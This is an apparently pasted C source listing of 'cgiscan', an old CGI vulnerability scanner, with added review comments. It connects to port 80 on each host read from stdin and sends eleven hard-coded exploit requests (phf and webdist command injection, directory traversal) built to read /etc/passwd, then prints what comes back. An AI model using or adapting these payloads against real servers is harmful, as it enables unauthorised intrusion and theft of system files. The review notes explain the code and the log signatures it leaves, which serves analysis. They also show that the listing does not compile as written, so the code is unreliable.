
Cgiscan

Guest on 25th April 2022 10:23:37 PM

  1. /* cgiscan.c is a simple cgi scanner. Improve it if you can! */
  2. /* Coded by sHaDy */
  3. /* Compile with gcc: cc cgiscan.c -o cgiscan */
  4. /* It works on Linux */
  5.  
  6. /*Include standards*/
  7. #include <sys/syslog.h>
  8. #include <sys/param.h>
  9. #include <sys/times.h>            
  10. #include <sys/time.h>                          
  11. #include <sys/socket.h>
  12. #include <netinet/in.h>
  13. #include <sys/signal.h>
  14. #include <arpa/inet.h>
  15. #include <netdb.h>
  16. #include <sys/stat.h>
  17. #include <sys/types.h>
  18. #include <termios.h>                  
  19. #include <stdio.h>
  20. #include <string.h>
  21. #include <fcntl.h>
  22.  
  23.  
  /* MAX is the size of the request table declared in main and the number of
     connections main makes to each host. */
  24. #define MAX 11
  25.  
  26.                             /* Request lines; main sends one per connection.
                                 Each is a bare "GET <path>" ended by a newline, with no
                                 HTTP version and no headers. Every path is under /cgi-bin/
                                 and most carry /etc/passwd or a "?*" wildcard in the query
                                 string, so the same strings in a web server access log
                                 identify this probe.
                                 NOTE(review): CGI_01, CGI_02, CGI_03, CGI_10 and CGI_11 lack
                                 the closing quote; CGI_05 and CGI_09 are the same string. */
  27. #       define CGI_01 "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd\n
  28. #       define CGI_02 "GET /cgi-bin/htmlscript?../../../../etc/passwd\n
  29. #       define CGI_03 "GET /cgi-bin/test-cgi?*\n
  30. #       define CGI_04 "GET /cgi-bin/view-source?../../../../etc/passwd\n"
  31. #       define CGI_05 "GET /cgi-bin/pfdisplay.cgi?/../../../../etc/passwd\n"
  32. #       define CGI_06 "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a\n"
  33. #       define CGI_07 "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20passwd\n"
  34. #       define CGI_08 "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd\n"
  35. #       define CGI_09 "GET /cgi-bin/pfdisplay.cgi?/../../../../etc/passwd\n"
  36. #       define CGI_10 "GET /cgi-bin/nph-test-cgi?*\n
  37. #       define CGI_11 "GET /cgi-bin/php.cgi?/etc/passwd\n
  38.  
  /*
   * Reads host names from stdin, one per line. For each host it echoes the
   * name to stdout, resolves it, then makes MAX TCP connections to port 80,
   * sending one request string per connection and copying everything the
   * server returns to stdout.
   *
   * NOTE(review): the listing does not compile as written. The first loop
   * uses MAXS, which is never defined, and the table is filled through
   * `string[...]` while the declared array is `stringhe`. <stdlib.h> and
   * <unistd.h> are not included directly although malloc, read and write
   * are called, and main has no declared return type.
   * NOTE(review): no library or system call result is checked anywhere in
   * this function; the inline notes below mark where that matters.
   */
  39. main (int argc, char *argv[])
  40. {
  41.   struct sockaddr_in sin;
  42.  
  43.         /* int outsocket, serv_len, len,c,outfd; */
  44.         /* struct hostent *nametocheck; */
  45.         /* struct in_addr outgoing; */
  46.  
  47.         struct hostent *hp;
              /* host and buffer are declared but not referenced again in this function. */
  48.         char host[100], buffer[1024], hosta[1024],FileBuf[8097];
  49.         int sock, i=0, X;
  50.         char  *stringhe[MAX];
              /* Allocates 100 bytes per slot. The assignments that follow store
                 string literals instead (presumably into the same table), so these
                 allocations would never be used or freed. */
  51.         for(i=0;i<MAXS;i++) {
  52.         stringhe[i]=(char *) malloc(sizeof(char)*100);
  53.       }
  54.                 string[0]=CGI_01;
  55.                 string[1]=CGI_02;
  56.                 string[2]=CGI_03;
  57.                 string[3]=CGI_04;
  58.                 string[4]=CGI_05;
  59.                 string[5]=CGI_06;
  60.                 string[6]=CGI_07;
  61.                 string[7]=CGI_08;
  62.                 string[8]=CGI_09;
  63.                 string[9]=CGI_10;
  64.                 string[10]=CGI_11;
  65.        
        /* fgets stores at most 99 characters per call in the 1024-byte hosta. */
  66.   while(fgets(hosta,100,stdin))
  67.     {
              /* Tested before the newline is stripped, so a blank input line
                 ("\n") does not end the loop. */
  68.         if(hosta[0] == '\0')
  69.                 break;
              /* Drops the last character, assumed to be the newline. A final line
                 without one, or a line longer than 99 characters, loses a real
                 character here. */
  70.         hosta[strlen(hosta) -1] = '\0';
              /* Echo the host name and a newline to stdout (descriptor 1). */
  71.         write(1,hosta,strlen(hosta)*sizeof(char));
  72.                 write(1,"\n",sizeof(char));
  73.        
                      /* NOTE(review): gethostbyname returns NULL when the name does not
                         resolve; hp is dereferenced in the loop below without a check. */
  74.                 hp = gethostbyname (hosta);
                      /* One new connection per request string. */
  75.                 for(i=0;i<MAX;i++) {
  76.                 bzero((char*) &sin, sizeof(sin));
  77.                 bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  78.                 sin.sin_family = hp->h_addrtype;
  79.                 sin.sin_port = htons(80);
                      /* The socket is always AF_INET while sin_family is taken from the
                         lookup result. Neither the socket() nor the connect() result is
                         tested; X is overwritten by the read loop below. */
  80.                 sock = socket(AF_INET, SOCK_STREAM, 0);
  81.                 X=connect(sock,(struct sockaddr *) &sin, sizeof(sin));
  82.                 write(sock,stringhe[i],strlen(stringhe[i])*sizeof(char));  
                      /* Copies the response to stdout until read returns 0. A read error
                         (-1) does not end the loop, and that -1 is passed to write as the
                         length. sock is never closed, so each request leaves one
                         descriptor open. */
  83.                 while((X=read(sock,FileBuf,8096))!=0)
  84.                 write(1,FileBuf,X);
  85.    
  86.    }
  87.  
  88.  }
  89. }
